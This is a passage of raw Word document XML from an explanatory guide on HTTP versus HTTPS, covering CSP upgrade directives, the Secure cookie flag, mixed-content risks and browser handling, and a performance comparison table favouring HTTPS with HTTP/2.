        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="913"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>upgrade-insecure-requests: Automatically upgrade HTTP resource loads to HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523778C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="913"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>default-src https:: Only allow HTTPS resources (block any HTTP content).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3521100F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Secure cookie flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5071D7E7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A74AB8F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E66358" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="914"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Secure: Cookie is ONLY sent over HTTPS connections. Never transmitted over HTTP (preventing interception).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297DEB01" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="6BDDB826">
          <v:rect id="_x0000_i3984" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAD5C81" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Mixed Content — The HTTP/HTTPS Boundary Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC2A438" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 What Mixed Content Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522CCA4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>A page loaded over HTTPS includes resources loaded over HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13117052" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0EAADF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>&lt;!-- Page loaded via https://example.com --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BDDF84" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>&lt;img src="http://cdn.example.com/image.jpg"&gt;          &lt;!-- Mixed passive content --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F348EC3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>&lt;script src="http://cdn.example.com/script.js"&gt;&lt;/script&gt;  &lt;!-- Mixed active content --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E55B770" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Why Mixed Content Is Dangerous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396B3368" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>The HTTPS page is secure — but the HTTP resource is not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609FF006" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>An attacker can modify the HTTP resource in transit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C80ED0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active mixed content (scripts, iframes):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Inject malicious JavaScript → full page compromise. The attacker can steal all data on the HTTPS page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FED2C55" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="915"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Passive mixed content (images, audio, video):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Can be eavesdropped or replaced (show inappropriate images, track behavior).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CAB2F0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Browser Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233F76FC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modern browser behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C45433" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="916"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Active mixed content (scripts, stylesheets, iframes, XMLHttpRequest, fetch):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> BLOCKED by default. The resource is not loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADEFA47" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="916"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passive mixed content (images, audio, video):</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Allowed but warned (padlock removed, "Not fully secure" indicator). Some browsers now block this too.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27342FCA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="916"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auto-upgrade:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Modern browsers attempt to upgrade HTTP resources to HTTPS automatically (load https:// instead of http://). If HTTPS isn't available, then block/warn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A227D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="33EE7075">
          <v:rect id="_x0000_i3985" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9E18A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. HTTP vs. HTTPS — Performance Comparison Table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242"/>
        <w:gridCol w:w="3157"/>
        <w:gridCol w:w="3951"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="22596D6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3E3397" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect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4DF422" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTP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9B92BF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>HTTPS (TLS 1.3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="1A9FF6A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C79F60" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Connection setup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3A093C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1 RTT (TCP)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80F0BB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>2 RTT (TCP + TLS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="02A004B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C6FBEE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Resumption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BB8BF7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>N/A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F5468A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>1 RTT (session ticket) or 0 RTT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="51BB81F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E269A7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Per-request CPU</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FBFED7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>None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6C6069" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>~microseconds (AES-NI)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="48DEA07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760187" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Bandwidth overhead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256A3D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>None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6989F8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>~21 bytes/record (5 header + 16 MAC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="2B3D80E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BF1056" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Supports HTTP/2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E27207" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Only h2c (no browser)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3D7EFD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes (all browsers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="39DD9EC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872BAE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Supports HTTP/3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A3A586" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>No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11F480" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes (QUIC mandates crypto)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="3D4CBCF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210EB0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Caching (proxy)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3D39F9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Yes (transparent proxies can cache)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E5DC99" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>No (content is encrypted, proxies can't cache)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006E6644" w:rsidRPr="006E6644" w14:paraId="1C06B62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F917A2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:lastRenderedPageBreak/>
              <w:t>Compression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0C7087" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Works normally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45BA3D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
              </w:pBdr>
            </w:pPr>
            <w:r w:rsidRPr="006E6644">
              <w:t>Works normally (within TLS tunnel)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48863FD8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key insight:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> HTTPS with HTTP/2 is actually FASTER than HTTP/1.1 in practice because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C2738" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP/2 multiplexing eliminates head-of-line blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418982CF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP/2 header compression (HPACK) reduces header size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536C1584" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>HTTP/2 server push pre-sends resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74824C61" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="917"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>One connection carries all requests (TLS handshake is amortized once).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B926DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="5D5D0CA6">
          <v:rect id="_x0000_i3986" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B14CF6A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
